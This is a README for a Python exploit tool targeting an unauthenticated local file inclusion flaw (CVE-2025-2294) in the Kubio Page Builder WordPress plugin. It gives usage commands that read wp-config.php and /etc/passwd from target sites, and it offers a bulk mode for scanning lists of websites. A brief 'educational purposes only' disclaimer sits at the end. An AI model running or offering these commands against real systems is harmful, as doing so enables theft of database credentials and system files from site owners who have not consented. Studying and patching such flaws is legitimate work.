# Kubio Page Builder LFI Exploit (CVE-2025-2294)



Local File Inclusion (LFI) exploit for Kubio Page Builder WordPress plugin (versions ≤ 2.5.1).
## 📌 Description
This tool exploits an unauthenticated LFI vulnerability in Kubio Page Builder plugin (CVE-2025-2294), allowing attackers to read sensitive files on vulnerable WordPress installations.
## 🚀 Features
- Single target mode (`-u`)
- Bulk scanning from file (`-l`)
- Version detection
- Output results to file (`-o`)
- Automatic vulnerable version check
- Custom file path support
## 📦 Installation
```bash
git clone https://github.com/mrrivaldo/CVE-2025-2294.git
```
## 🛠 Usage
### Basic Single Target
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com
```
### Custom File Path
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
```
### Bulk Scan Mode
```bash
python3 cve-2025-2294.py -l targets.txt -o results.txt
```
### Help Menu
```bash
python3 cve-2025-2294.py --help
```
## ⚙ Options
| Option | Description |
|--------|-------------|
| `-u`, `--url` | Single target URL |
| `-l`, `--list` | File containing list of targets |
| `-f`, `--file` | File to read (default: `/etc/passwd`) |
| `-o`, `--output` | Save vulnerable targets to file |
## 📝 Example File Structure
`targets.txt`:
```
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
```
## ⚠ Legal Disclaimer
This tool is for **educational purposes only**. The developer is not responsible for any misuse. Always obtain proper authorization before testing any systems.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view